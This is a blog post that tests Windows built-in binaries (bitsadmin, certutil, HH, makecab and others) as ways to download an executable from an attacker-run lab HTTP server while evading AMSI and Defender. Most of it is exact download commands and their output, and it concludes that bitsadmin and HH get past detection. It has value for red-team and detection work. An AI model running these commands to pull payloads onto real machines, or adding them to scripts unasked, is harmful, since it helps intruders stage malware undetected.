Recently Microsoft has started blocking the use of certutil to download files. There are several other tools on Windows tat you can use to download files from the internet available on Windows however. These are called Living Off the Land Binaries, or LOLBINS, as they are part of a standard Windows installation.

This is a rundown of all the tools that I know of that can download files on Windows using a current Windows version (Build 10.0.17134 rs4_release.180410-1804) with up-to-date Windows Defender and AMSI databases.

Setting up a lab

On a Kali Linux I am running a simple HTTP server using python -m SimpleHTTPServer 80. Here a single file, test.exe can be downloaded.

In my test lab I have setup a Windows 10 machine and applied all the recent updates, I also let it update all the necessary Defender and AMSI databases.

The target is to download the file test.exe from the URL http://192.168.38.201/test.exe without triggering AMSI.

Finding Binaries and Scripts

The LOLBAS Project has a great overview of all the tools available on Windows by default that we can use to download, execute or dump files. The repository is continually updated, so keep a close eye on it if you are into such a thing (and who wouldn’t be?).

Lets get started.

Bitsadmin

Status: works

bitsadmin /create /download bitsadmin 
bitsadmin /addfile bitsadmin http://192.168.38.201/test.exe  c:\Users\vagrant\test.exe 
bitsadmin /RESUME bitsadmin
bitsadmin /complete bitsadmin

Result from running:

PS C:\Users\vagrant> bitsadmin /create /download bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Created job {9ABA2A9C-7DDE-4C27-AE40-43AA45C1D16A}.

PS C:\Users\vagrant> bitsadmin /addfile bitsadmin http://192.168.38.201/test.exe  c:\Users\vagrant\test.exe

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Added http://192.168.38.201/test.exe -> c:\Users\vagrant\test.exe to job.

PS C:\Users\vagrant> bitsadmin /RESUME bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Job resumed.

PS C:\Users\vagrant> bitsadmin /complete bitsadmin

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Job completed.

Certutil

Status: AMSI Alert

certutil.exe -urlcache -split -f http://192.168.38.201/test.exe c:\Users\vagrant\test.exe 

Result

At line:1 char:1
+ certutil.exe -urlcache -split -f http://192.168.38.201/test.exe c:\Us ...
+ `````````````````````````````````````````````````````````````````````
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

Esentutl

Status: does not support HTTP

esentutl.exe /y http://192.168.38.201/test.exe /d c:\Users\vagrant\test.exe  /o

Result

PS C:\Users\vagrant> esentutl.exe /y http://192.168.38.201/test.exe /d c:\Users\vagrant\test.exe  /o

Initiating COPY FILE mode...
     Source File: http://192.168.38.201/test.exe
Destination File: c:\Users\vagrant\test.exe

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          FAILURE: CreateFile:  (123), The filename, directory name, or volume label syntax is incorrect.




Operation terminated with error -1 (JET_wrnNyi, Function Not Yet Implemented) after 0.0 seconds.

Expand

Binary that expands one or more compressed files.

Status: does not support HTTP

expand http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> expand http://192.168.38.201/test.exe c:\Users\vagrant\test.exe
Microsoft (R) File Expansion Utility
Copyright (c) Microsoft Corporation. All rights reserved.

Can't open input file: http://192.168.38.201/test.exe.

Extrac32

Status: does not support HTTP

extrac32 /Y /C http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

No output

Findstr

Status: does not support HTTP

findstr /V /L SOMETHINGELSE http://192.168.38.201/test.exe > c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> findstr /V /L SOMETHINGELSE http://192.168.38.201/test.exe > c:\Users\vagrant\test.exe
FINDSTR: Cannot open http://192.168.38.201/test.exe

HH

Status: works, only GUI

HH.exe http://192.168.38.201/test.exe

Result

Pops up a GUI, file downloaded

ieexec

Status: Not present in default install

makecab

Status: does not support HTTP

makecab http://192.168.38.201/test.exe c:\Users\vagrant\test.exe

Result

PS C:\Users\vagrant> makecab http://192.168.38.201/test.exe c:\Users\vagrant\test.exe
Cabinet Maker - Lossless Data Compression Tool

ERROR: Could not find file: http://192.168.38.201/test.exe

Replace

Status: does not support HTTP

replace http://192.168.38.201/test.exe c:\Users\vagrant\test.exe /A

Result

PS C:\Users\vagrant> replace http://192.168.38.201/test.exe c:\Users\vagrant\test.exe /A
Invalid switch - //192.168.38.201
No files replaced

Conclusion

So, from my quick tests it seems the only usable tools to transfer from an HTTP server are bitsadmin and HH. The other tools marked as “Download” might also work, but only over SMB connections, which you might not have available.

Tags:

Updated: